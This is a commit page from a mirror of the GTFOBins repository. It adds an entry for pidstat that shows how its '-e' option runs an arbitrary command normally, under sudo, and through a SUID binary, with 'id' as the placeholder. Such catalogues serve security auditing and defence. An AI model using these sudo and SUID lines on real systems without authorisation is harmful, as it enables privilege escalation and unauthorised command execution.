mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add pidstat
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
cd05b58e70
commit
7bc41773f6
15
_gtfobins/pidstat.md
Normal file
15
_gtfobins/pidstat.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
command:
|
||||||
|
- code: |
|
||||||
|
COMMAND=id
|
||||||
|
pidstat -e $COMMAND
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
COMMAND=id
|
||||||
|
sudo pidstat -e $COMMAND
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
COMMAND=id
|
||||||
|
./pidstat -e $COMMAND
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user